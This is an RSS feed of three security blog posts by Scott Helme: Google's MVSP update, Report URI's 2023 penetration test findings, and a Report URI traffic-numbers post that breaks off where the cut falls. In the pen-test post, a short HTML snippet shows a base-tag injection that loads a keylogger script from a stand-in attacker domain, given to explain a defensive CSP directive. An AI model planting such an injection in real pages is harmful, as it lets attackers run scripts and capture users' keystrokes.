<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[Scott Helme]]></title><description><![CDATA[Hi, I'm Scott Helme, a Security Researcher, Entrepreneur and International Speaker. I'm the creator of Report URI and Security Headers, and I deliver world renowned training on Hacking and Encryption.]]></description><link>https://scotthelme.co.uk/</link><image><url>https://scotthelme.co.uk/favicon.png</url><title>Scott Helme</title><link>https://scotthelme.co.uk/</link></image><generator>Ghost 5.79</generator><lastBuildDate>Mon, 19 Feb 2024 13:11:52 GMT</lastBuildDate><atom:link href="https://scotthelme.co.uk/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[Google update their Minimum Viable Secure Product]]></title><description><![CDATA[<p>Back in 2021, Google launched, alongside other organisations, a new security baseline for products known as the Minimum Viable Secure Product. Now, 2 years later, they&apos;ve released an update to that standard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/mvsp.svg" class="kg-image" alt loading="lazy" width="300" height="116"></figure><p></p><p>This a cross-post of my article on the Probely blog, you can <a href="https://probely.com/blog/google-update-their-minimum-viable-secure-product?ref=scotthelme.co.uk" rel="noreferrer">read the original</a> there.</p>]]></description><link>https://scotthelme.co.uk/google-announce-new-minimum-viable-secure-product/</link><guid isPermaLink="false">655caa933a9d56000144a9cc</guid><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Tue, 28 Nov 2023 13:50:15 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/mvsp.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/mvsp.png" alt="Google update their Minimum Viable Secure Product"><p>Back in 2021, Google launched, alongside other organisations, a new security baseline for products known as the Minimum Viable Secure Product. Now, 2 years later, they&apos;ve released an update to that standard.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/mvsp.svg" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="300" height="116"></figure><p></p><p>This a cross-post of my article on the Probely blog, you can <a href="https://probely.com/blog/google-update-their-minimum-viable-secure-product?ref=scotthelme.co.uk" rel="noreferrer">read the original</a> there.</p><p></p><h4 id="minimum-viable-secure-product">Minimum Viable Secure Product</h4><p>You can read the <a href="https://security.googleblog.com/2021/10/launching-collaborative-minimum.html?ref=scotthelme.co.uk" rel="noreferrer">original announcement</a> from Google if you like, but we&apos;ll be focusing a lot more <a href="https://security.googleblog.com/2023/11/two-years-later-baseline-that-drives-up.html?ref=scotthelme.co.uk" rel="noreferrer">on the update</a> released a couple of days ago. The <a href="https://mvsp.dev/?ref=scotthelme.co.uk" rel="noreferrer">MVSP site</a> is also a great place to get a lot more detail on the project and track future changes or updates.</p><p>In terms of what the MVSP project is trying to achieve, I think this snippet from the site gives a really good idea of exactly what it&apos;s about:</p><p></p><blockquote>Minimum Viable Secure Product (MVSP) is a list of essential application security controls that should be implemented in enterprise-ready products and services. The controls are designed to be simple to implement and provide a good foundation for building secure and resilient systems and services. MVSP is based on the experience of contributors in enterprise application security and has been built with contributions from a range of companies.</blockquote><p></p><p>I&apos;ve said myself many times in the past that sometimes, we need to focus on getting the basics right before we get carried away on more complex or elaborate risk reduction, and MVSP aligns extremely well with that approach. You should read through all of the requirements outlined on the site, of course, but I&apos;m going to pick a few that are near and dear to my heart to focus on!</p><p></p><h4 id="%C2%A711-external-vulnerability-reports">&#xA7;1.1 External Vulnerability Reports</h4><p>As I sit and write this blog post, I&apos;m currently going through two responsible disclosure processes where I&apos;m desperately trying to get in touch with the organisations in question. I&apos;ve tried email to customer services, I&apos;ve raised a support ticket, I&apos;ve reach out to people listed as employees on Linked In and finally, I have to resort to public calls for help:</p><p></p>
<!--kg-card-begin: html-->
<blockquote class="twitter-tweet tw-align-center"><p lang="en" dir="ltr">Hey <a href="https://twitter.com/capellisport?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">@capellisport</a>, we&apos;ve made several attempts to contact you via various channels! <br><br>Does anyone have a security contact or some way of reaching an appropriate person? Please reach out, my DMs are open.</p>&#x2014; Scott Helme (@Scott_Helme) <a href="https://twitter.com/Scott_Helme/status/1726906880130465911?ref_src=twsrc%5Etfw&amp;ref=scotthelme.co.uk">November 21, 2023</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script><br>
<!--kg-card-end: html-->
<p></p><p>This is downright ridiculous and it should not be this hard to get in touch with an organisation to let them know that they have a serious security issue!! That&apos;s precisely what the <a href="https://scotthelme.co.uk/say-hello-to-security-txt/?ref=scotthelme.co.uk" rel="noreferrer">Security.txt</a> file is for. You can read the full details in that blog post, but the TLDR; It&apos;s a simple text file you host with details on how people can contact you to report security vulnerabilities / responsible disclosure.</p><p>You can see mine here:<br><a href="https://scotthelme.co.uk/.well-known/security.txt?ref=scotthelme.co.uk">https://scotthelme.co.uk/.well-known/security.txt<br><a href="https://report-uri.com/.well-known/security.txt?ref=scotthelme.co.uk">https://report-uri.com/.well-known/security.txt<br></a><a href="https://securityheaders.com/.well-known/security.txt?ref=scotthelme.co.uk">https://securityheaders.com/.well-known/security.txt</a></a></p><p></p><h4 id="%C2%A714-external-testing">&#xA7;1.4 External Testing</h4><p>No matter how good your own security processes are, you always need another set of eyes to spot the issues you&apos;ve missed. As a penetration tester for many years myself, I understand the value of such services form both sides of the conversation, as the &apos;hacker&apos; conducting the test, and as the company on the receiving end. My own company, <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, has just had its annual penetration test completed by an external company and, as always, the <a href="https://scotthelme.co.uk/report-uri-penetration-test-2023/?ref=scotthelme.co.uk" rel="noreferrer">full report is published</a> for anyone to see!</p><p></p><figure class="kg-card kg-image-card"><a href="https://pentest.co.uk/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/pentest-1.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="375" height="84"></a></figure><p></p><p>I don&apos;t think you can just have an annual penetration test and then brush your hands together and say &apos;all good&apos;, though. Penetration tests won&apos;t find all issues, and, if you&apos;re only having a test once per year, an issue could easily sit around for 6+ months until it&apos;s discovered. Not good... That&apos;s why it&apos;s also a great to idea to use a <a href="https://probely.com/?ref=scotthelme.co.uk" rel="noreferrer">DAST solution like Probely</a> that can scan your application for vulnerabilities on a far more regular basis. </p><p></p><figure class="kg-card kg-image-card"><a href="https://probely.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/probely.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="263" height="55"></a></figure><p></p><p>Just like a penetration test, Probely (or any other tool), won&apos;t find all issues, but they can find issues much sooner and much cheaper than a penetration test. There&apos;s no point in spending thousands of dollars for a penetration tester to find and report issues that you could have found for hundreds of dollars instead. Not only that, but you can find them sooner, and we&apos;ve all seen the graph on the cost of fixings bugs, right?</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/cost-to-fix-bugs.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="1080" height="1080" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/cost-to-fix-bugs.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/cost-to-fix-bugs.png 1000w, https://scotthelme.co.uk/content/images/2023/11/cost-to-fix-bugs.png 1080w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Remember that all security vulnerabilities like this are basically just bugs that need fixing! The sooner you find them, the cheaper they are to fix and the less risk you were exposed to.</p><p></p><h4 id="%C2%A723-security-headers">&#xA7;2.3 Security Headers</h4><p>Yeah! Who doesn&apos;t love some Security Headers?! Not only do they recommend using Security Headers (the actual HTTP response headers), but they also recommend using <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">Security Headers (our website!)</a> to scan and assess your headers!</p><p></p><figure class="kg-card kg-image-card"><a href="https://securityheaders.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-24.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="508" height="178"></a></figure><p></p><p>You can see the recommendation and link to us <a href="https://mvsp.dev/faq-mvsp.en/?ref=scotthelme.co.uk#FAQ_2_3" rel="noreferrer">right here</a>, and I&apos;m super grateful for our free service to be mentioned like this. Head over to <a href="https://securityheaders.com/?ref=scotthelme.co.uk" rel="noreferrer">our site</a> and you can perform a free scan that takes 2-3 seconds right now!</p><p></p><h4 id="%C2%A733-vulnerability-prevention">&#xA7;3.3 Vulnerability prevention</h4><p>After working in the Cyber Security world for so long, one thing that I realised was there are always solutions to any problem you may have, and often, they&apos;re quite easy. The problem that I&apos;ve always come across is that people simply didn&apos;t know about the solution, and it&apos;s one of the things I focus on in both training courses I deliver. You can see full details on my <a href="https://scotthelme.co.uk/training/?ref=scotthelme.co.uk" rel="noreferrer">Training page</a>, but here&apos;s the summary of the two training courses I deliver:</p><p></p><figure class="kg-card kg-image-card"><a href="https://www.troyhunt.com/workshops/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2020/06/training-page-image.JPG" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy"></a></figure><p><a href="https://www.troyhunt.com/workshops/?ref=scotthelme.co.uk" rel="noreferrer">Hack Yourself First</a>: In collaboration with <a href="https://twitter.com/troyhunt?ref=scotthelme.co.uk" rel="noreferrer">Troy Hunt</a>, I deliver his awesome, 2-day workshop where we learn how to hack in to our demo application and then how to defend against those attacks.</p><p></p><figure class="kg-card kg-image-card"><a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-25.png" class="kg-image" alt="Google update their Minimum Viable Secure Product" loading="lazy" width="970" height="442" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-25.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-25.png 970w" sizes="(min-width: 720px) 720px"></a></figure><p><a href="https://www.feistyduck.com/training/practical-tls-and-pki?ref=scotthelme.co.uk" rel="noreferrer">Practical TLS and PKI</a>: In collaboration with <a href="https://twitter.com/ivanristic?ref=scotthelme.co.uk" rel="noreferrer">Ivan Ristic</a>, I deliver his incredible, 2-day training where we deploy and fully configure TLS and PKI in real-world environments. This training course also ties in superbly well with MVSP &#xA7;2.2 HTTPS-only and &#xA7;2.8 Encryption!</p><p></p><h4 id="do-you-meet-the-mvsp-requirements">Do you meet the MVSP requirements?</h4><p>I&apos;m sure that many of you reading this blog post will be able to quickly flick through the list of requirements and check them off, but can you check off all of them?</p><p>It&apos;s really interesting to see the direction that MVSP is going in and I wholeheartedly agree with everything that&apos;s in there. As the name would imply, this is the <strong><em>Minimum</em></strong> Viable Secure Product and not the <strong><em>Maximum</em></strong> Viable Secure Product, so you could and should be exceeding many of these requirements, especially if you&apos;re a security focused company like we are! I&apos;d like to leave you with this quote from the MVSP docs, highlight my own:</p><p></p><blockquote>Minimum Viable Secure Product (MVSP) is a list of <strong>essential</strong> application security controls that should be implemented in enterprise-ready products and services.</blockquote><p></p>]]></content:encoded></item><item><title><![CDATA[Report URI Penetration Test 2023]]></title><description><![CDATA[<p>It&apos;s that time of year again at <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, right before we start getting festive, that we have our annual penetration test and 2023 is going to be our fourth test that we publish in full.</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/report-uri.png" class="kg-image" alt loading="lazy" width="946" height="525" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/report-uri.png 600w, https://scotthelme.co.uk/content/images/2023/11/report-uri.png 946w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="penetration-tests">Penetration Tests</h4><p>Our previous penetration tests, which were also published publicly, were</p>]]></description><link>https://scotthelme.co.uk/report-uri-penetration-test-2023/</link><guid isPermaLink="false">65490ebd5065ae0001b5e1b0</guid><category><![CDATA[Report URI]]></category><category><![CDATA[Penetration Test]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Mon, 20 Nov 2023 11:05:19 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/pen-test-report-banner.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/pen-test-report-banner.png" alt="Report URI Penetration Test 2023"><p>It&apos;s that time of year again at <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, right before we start getting festive, that we have our annual penetration test and 2023 is going to be our fourth test that we publish in full.</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/report-uri.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="946" height="525" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/report-uri.png 600w, https://scotthelme.co.uk/content/images/2023/11/report-uri.png 946w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="penetration-tests">Penetration Tests</h4><p>Our previous penetration tests, which were also published publicly, were back in <a href="https://scotthelme.co.uk/report-uri-penetration-test-2020/?ref=scotthelme.co.uk" rel="noreferrer">2020</a>, <a href="https://scotthelme.co.uk/report-uri-penetration-test-2021/?ref=scotthelme.co.uk" rel="noreferrer">2021</a>, <a href="https://scotthelme.co.uk/report-uri-penetration-test-2022/?ref=scotthelme.co.uk" rel="noreferrer">2022</a>, and now it&apos;s time for the 2023 edition. Just as it was before, there were no artificial limits placed on the scope of the penetration test and it was a 5-day test. Again, we provided our source code as part of our test because it can help the tester move much more quickly and confirm or even discover issues by looking over the code. I really stressed the point that we wanted to be absolutely confident that we didn&apos;t have any issues lurking after another year of introducing new code and bug fixes, so I requested the best tester they had on staff. I also provided as much information as I could, full featured accounts, test data, a demo of the application and access to our source code. </p><p></p><h4 id="the-results">The Results</h4><p>Maintaining the same number of findings as last year, but swapping around the ratings a little, here is the summary for our 2023 findings.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-18.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="607" height="388" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-18.png 600w, https://scotthelme.co.uk/content/images/2023/11/image-18.png 607w"></figure><p></p><p>This is an outcome to be really pleased with, given that we were trying our best to uncover any issues that we may have and leaves me feeling really confident that our existing processes continue to serve us well. Let&apos;s take a look through the report in more detail and see exactly what was found.</p><p></p><h4 id="51-vulnerabilities-in-outdated-dependencies-detected">5.1 Vulnerabilities in Outdated Dependencies Detected</h4><p>Again?! This one did come as a little bit of a surprise to me and you may recognise this from the 2022 report. This finding is in a different dependency that has since had an issue identified, but I was surprised that we were able to use a dependency with a known vulnerability. </p><p>We have a GitHub action that checks all of our JS dependencies for known issues but it seems it was having trouble with this one which I&apos;m investigating further. This has now been resolved and the dependency updated!</p><p></p><figure class="kg-card kg-image-card"><a href="https://security.snyk.io/vuln/npm:datatables:20151106?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-23.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1259" height="738" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-23.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-23.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-23.png 1259w" sizes="(min-width: 720px) 720px"></a></figure><p></p><p>It was also noted that our version of Bootstrap was EOL but there are currently no known issues and we have our CSP as an additional control too. This is something we&apos;re aware of and it will be addressed in due course.</p><p></p><h4 id="52-insecure-tlsssl-configuration">5.2 Insecure TLS/SSL Configuration</h4><p>This was only raised as an info item on the report and is also something we&apos;re aware of. Given the wide variety of clients that report telemetry to us, we do have a wide array of cipher suites on offer to support them all. We do support the latest and greatest protocol versions and cipher suites, so modern clients will always have the best protection available. We won&apos;t be making any changes for this item and if you&apos;d like, you can view our <a href="https://www.ssllabs.com/ssltest/analyze.html?d=report-uri.com&amp;latest=&amp;ref=scotthelme.co.uk" rel="noreferrer">SSL Labs results</a>. </p><p></p><figure class="kg-card kg-image-card"><a href="https://www.ssllabs.com/ssltest/analyze.html?d=report-uri.com&amp;latest=&amp;ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/image-22.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1033" height="580" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-22.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-22.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-22.png 1033w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="53-csp-configured-without-%E2%80%98base-uri%E2%80%99-directive">5.3 CSP configured without &#x2018;base-uri&#x2019; directive</h4><p>We had previously and consciously not set the <code>base-uri</code> directive in our Content Security Policy. The <code>&lt;base&gt;</code> tag in HTML allows you to set the base URL for path-relative assets, like so:</p><pre><code class="language-html">&lt;base href=&quot;https://evil-cyber-hacker.com/&quot;&gt;
&lt;script src=&quot;/keylogger.js&quot;&gt;&lt;/script&gt;</code></pre><p></p><p>The URL used to load the script by the browser would now be:</p><p> <code>https://evil-cyber-hacker.com/keylogger.js</code></p><p></p><p>The problem the attacker would have is the JS load would still be subject to our strict <code>script-src</code> in our CSP and the <code>evil-cyber-hacker.com</code> domain is not allowed, so the script wouldn&apos;t load. Ultimately, the <code>base-uri</code> directive not being present wouldn&apos;t allow an attacker to do anything, but we still added it anyway!</p><p></p><h4 id="appendix">Appendix</h4><p>We then get on to some really interesting parts of the report that can only be found in the Appendix because they were not actually findings on the test, but they could have been if circumstances were different. I&apos;m really proud of this section and it just goes to show how our <a href="https://en.wikipedia.org/wiki/Defense_in_depth_(computing)?ref=scotthelme.co.uk" rel="noreferrer">Defense In Depth</a> strategy can really pay off!</p><p></p><h4 id="a1-codeigniter-validation-placeholders-rce">A1. CodeIgniter Validation Placeholders RCE</h4><p>When Report URI was first built, it used the CodeIgniter framework exclusively. Over the years we have slowly migrated away from CodeIgniter and that migration is almost complete, with very, very little of our application even touching CodeIgniter now. </p><p>A new feature, called Validation Placeholders, that was not supported in the version of CodeIgniter we use, nor was its predecessor feature used by our code, contained a pretty serious Remote Code Execution vulnerability. You can read the full details in the <a href="https://github.com/codeigniter4/CodeIgniter4/security/advisories/GHSA-m6m8-6gq8-c9fj?ref=scotthelme.co.uk" rel="noreferrer">security advisory</a>, so I won&apos;t reproduce them here, but I was able to quickly evaluate the functionality of Validation Placeholders, and of our usage of  Validation Rules, to determine that we were not vulnerable. Despite that, we still took robust action. I will quote directly from the report:</p><p></p><blockquote>While Report URI used CI 3, which did not have the vulnerable feature, a patch was deployed the same day which addressed any remaining concerns. All validation rules were changed to use arrays, rather than pipe format shown in examples above. This prevents the sort of injection which enabled the placeholders to execute code. A static analysis rule was also added which forces validation rules to use Report URI&#x2019;s wrapped rules, rather than CI&#x2019;s default ones. Finally, the wrapped rules were changed to only accept arrays and not strings.</blockquote><p></p><blockquote>However, without CI 4&#x2019;s placeholders, untrusted data is never injected into the execution context, as one would expect... As such, while Report URI was never exposed to this vulnerability, additional measures have been taken to further strengthen defences against it. Finally, this issue also encouraged Report URI to accelerate their transition away from CodeIgniter.</blockquote><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-19.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1186" height="667" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-19.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-19.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-19.png 1186w" sizes="(min-width: 720px) 720px"></figure><p></p><p></p><p></p><h4 id="a2-race-condition-on-email-change">A2. Race Condition on Email Change</h4><p>This was an interesting issue for the tester to come across and one that was pretty easy for us to resolve. By submitting multiple requests to change the email address on the registered account within the same HTTP/2 packet, a user account was able to be &apos;cloned&apos; into several instances of the same account but with different email addresses associated. </p><p></p><blockquote>During penetration testing, a race condition vulnerability was identified in the user email address change functionality. While the condition enabled the creation of duplicate user accounts, it was without immediate security risk, due to the robust &quot;fail fast and fail early&quot; principles employed by the application. The duplicates were clones, inheriting access to the original accounts&apos; subscriptions &#x2013; meaning that each duplicated account had their usage counted against the original account&#x2019;s limits.</blockquote><p></p><p>There were no security concerns presented by this issue and it only posed a problem for the person &apos;cloning&apos; their account because it would break certain functionality of their account and yield no benefits. This issue is possible because of inherent limitations in <a href="https://scotthelme.co.uk/working-with-azure-table-storage/?ref=scotthelme.co.uk" rel="noreferrer">Azure Table Storage</a> not being accounted for in our code. I wrote about why I chose Table Storage all the way back in <a href="https://scotthelme.co.uk/choosing-and-using-azure-table-storage-for-report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">2015</a>.</p><p>Table Storage is a simple key:value store and it doesn&apos;t support atomic operations. Entities are inserted into a table and have two properties, the Partition Key and Row Key, that form the primary key for lookup and can&apos;t be changed. Because of the unique constraint on the combination of the Partition Key and Row Key, we store the user email address in the Row Key to prevent duplication of accounts with the same email address. The Partition Key and Row Key also can&apos;t be modified for an entity, they are the only properties that are permanent. This means to change the email address for a user we have to clone their user entity into a new entity with a different email address in the Row Key, insert the new entity and delete the old entity. It was racing the delete process that made this issue possible.</p><p>Because Table Storage doesn&apos;t support atomic operations, I couldn&apos;t fix the problem there, so I turned to our Redis cache, which does support atomic operations. By implementing a new &apos;user entity write lock&apos; mechanism, we could leverage Redis to easily resolve this problem.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-20.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1201" height="859" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-20.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-20.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-20.png 1201w" sizes="(min-width: 720px) 720px"></figure><p></p><p>Here&apos;s the code to do this in Redis:</p><pre><code class="language-php">$this-&gt;redis-&gt;set(&apos;entityLock:&apos; . $email, &apos;1&apos;, [&apos;NX&apos;, &apos;EX&apos; =&gt; 15]);</code></pre><p></p><p>To snip the explanation text from the issue:</p><blockquote>The NX option will cause the write to Redis to fail if the key already exists, and the EX option sets the expiry on the key to 15 seconds. This means a user can only change their email address every 15 seconds, but fixes the race condition found in the penetration test.</blockquote><p></p><p>To quote the penetration test report:</p><blockquote>Despite the lack of security implications, it is worth commending Report URI&#x2019;s swift remediation of the issue.</blockquote><p></p><h4 id="a3-potential-issue-%E2%80%93-path-access-control">A3. Potential Issue &#x2013; Path Access Control </h4><p>We have some Controllers that perform functions only intended to be accessed and triggered from the Command-Line Interface. Our Router takes care of ensuring that any requests coming in from Nginx can&apos;t hit these Controllers as they are only intended to be called from the CLI. It turns out we had a small bug in our Router code and you could indeed hit these Controllers with HTTP requests. Despite this, there was no issue, and I will quote from the report:</p><p></p><blockquote>However, all affected controllers inherited from a base command line controller class, whose constructor performed an additional verification of the execution context. Any attempt to create (access) these controllers outside of a command-line context would raise an error, as demonstrated below: <br><br><em>-snip-</em><br><br>As such, while it was never possible to reach the affected controllers, this issue highlights the importance of not making assumptions when security could be affected. Thanks to robust code and multi-layered validation, the application prevented the issue from being exploitable &#x2013; and in fact, entirely mitigated the vulnerability before it was even discovered. Report URI has since patched the issue to remove any residual risk.</blockquote><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/11/image-21.png" class="kg-image" alt="Report URI Penetration Test 2023" loading="lazy" width="1111" height="547" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/image-21.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/11/image-21.png 1000w, https://scotthelme.co.uk/content/images/2023/11/image-21.png 1111w" sizes="(min-width: 720px) 720px"></figure><p></p><p>It&apos;s hard to imagine what someone could do with this capability, maybe they could update our aggregate count data a little more frequently, but either way, it was still a bug that needed to be fixed!</p><p></p><h4 id="another-success">Another Success!</h4><p>I think it&apos;s fair to say that this test went exceptionally well and despite all of our best efforts over the last 12 months, there are still improvements that we&apos;ve had to make as a result of getting the test done. As I&apos;ve said before, you really want to help a tester as much as you can to get the most value out of a test like this, and as before, here is the full, unredacted PDF report if you&apos;d like a read.</p><p></p><p><a href="https://cdn.report-uri.com/pdf/Report%20URI%20-%202023%20Penetration%20Test%20Report.pdf?ref=scotthelme.co.uk" rel="noreferrer">Report URI - 2023 Penetration Test Report</a></p><p></p>]]></content:encoded></item><item><title><![CDATA[Report URI: A week in numbers! (2023 edition)]]></title><description><![CDATA[<p>I simply can&apos;t believe that Report URI has now processed 1,500,000,000,000+ reports, which is unreal! That&apos;s over one trillion, five hundred billion reports... &#x1F92F;</p><p>This tiny little project, that I had the idea of starting all those years ago, is now processing</p>]]></description><link>https://scotthelme.co.uk/report-uri-a-week-in-numbers-2023-edition/</link><guid isPermaLink="false">650d63f15f929f0001f8a3fa</guid><category><![CDATA[Report URI]]></category><dc:creator><![CDATA[Scott Helme]]></dc:creator><pubDate>Fri, 10 Nov 2023 15:12:49 GMT</pubDate><media:content url="https://scotthelme.co.uk/content/images/2023/11/cpu.png" medium="image"/><content:encoded><![CDATA[<img src="https://scotthelme.co.uk/content/images/2023/11/cpu.png" alt="Report URI: A week in numbers! (2023 edition)"><p>I simply can&apos;t believe that Report URI has now processed 1,500,000,000,000+ reports, which is unreal! That&apos;s over one trillion, five hundred billion reports... &#x1F92F;</p><p>This tiny little project, that I had the idea of starting all those years ago, is now processing incredibly large amounts of data on a day-by-day basis. So why don&apos;t we take a look at the numbers?</p><p></p><figure class="kg-card kg-image-card"><a href="https://report-uri.com/?ref=scotthelme.co.uk"><img src="https://scotthelme.co.uk/content/images/2023/11/Report-URI-Twitter-Card.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy" width="800" height="400" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/11/Report-URI-Twitter-Card.png 600w, https://scotthelme.co.uk/content/images/2023/11/Report-URI-Twitter-Card.png 800w" sizes="(min-width: 720px) 720px"></a></figure><p></p><h4 id="report-uri">Report URI</h4><p>If you aren&apos;t familiar with <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">Report URI</a>, here&apos;s the TDLR: Modern web browsers have a heap of security and monitoring capabilities built in, and when something goes wrong on your site, they can send telemetry to let you know you have a problem. We ingest that telemetry on behalf of our customers, and extract the value from the data.</p><p>Over the years, as our customer base has grown, we are of course receiving more and more telemetry from more and more clients. This has also been expanded to include email servers which can also send telemetry about the security of emails you send! If you want any details on our product offering, the Products menu on our <a href="https://report-uri.com/?ref=scotthelme.co.uk" rel="noreferrer">homepage</a> will help you out, but this blog post isn&apos;t about that, it&apos;s about the numbers!</p><p></p><h4 id="our-infrastructure">Our infrastructure</h4><p>In a recent <a href="https://scotthelme.co.uk/unravelling-mystery-of-truncated-post-requests-report-uri/?ref=scotthelme.co.uk" rel="noreferrer">blog post</a> I gave an overview of our infrastructure which really hasn&apos;t changed much over the years and has held up really well to the volume of traffic we&apos;re handling. I&apos;ll repeat the highlights here because it will help make the following data more understandable once I get into it. Here&apos;s the diagram that explains our traffic flow, along with the explanation, and you can see it&apos;s the exact same diagram I <a href="https://scotthelme.co.uk/report-uri-a-week-in-numbers/?ref=scotthelme.co.uk" rel="noreferrer">published</a> over 5 years ago when I last spoke about it, and our infrastructure was the same long before that too:</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/09/image.png" class="kg-image" alt="Report URI: A week in numbers! (2023 edition)" loading="lazy"></figure><p></p><ol><li>Data is sent by web browsers as a POST request with a JSON payload.</li><li>Requests pass through our Cloudflare Worker which aggregates the JSON payloads from many requests, returning a 201 to the client.</li><li>Aggregated JSON payloads are dispatched to our origin &apos;ingestion&apos; servers on a short time interval.</li><li>The ingestion servers process the reports into Redis.</li><li>The &apos;consumer&apos; servers take batches of reports from Redis, applying advanced filters, threat intelligence, quota restrictions and per-user settings and filters, before placing them into persistent storage in Azure.</li></ol><p></p><p>When traffic volumes are low during the day, this entire processing pipeline averages less than sixty seconds from us receiving the report to you having the data in your dashboard and visible to you. When all of America is awake and online, our busiest period of the day, we typically see processing times between three and four minutes, with the odd outliers taking possibly five or six minutes to make it through. Overall, we work as much as we can to get this time down and keep it down, but I think it&apos;s pretty reasonable.</p><p></p><h4 id="the-history-of-the-service">The history of the service</h4><p>I first launched Report URI in <a href="https://scotthelme.co.uk/csp-and-hpkp-violation-reporting-with-report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">May 2015</a> after having worked on it and used it myself for quite some time and since then, I&apos;ve covered it extensively right here on my blog. You can find the older blog posts using <a href="https://scotthelme.co.uk/tag/report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">this tag</a>, and the newer ones using <a href="https://scotthelme.co.uk/tag/report-uri/?ref=scotthelme.co.uk" rel="noreferrer">this tag</a>, but any change worth mentioning is something I&apos;ve talked openly about. Here&apos;s a quick overview of how our report volume has grown over time.</p><p>Sep 2015 -  <a href="https://scotthelme.co.uk/running-the-numbers-on-report-uri-io/?ref=scotthelme.co.uk" rel="noreferrer">250,000 reports processed in a single week</a><br>Sep 2016 - <a href="https://scotthelme.co.uk/introducing-sensible-limits-to-report-uri-io/?ref=scotthelme.co.uk" 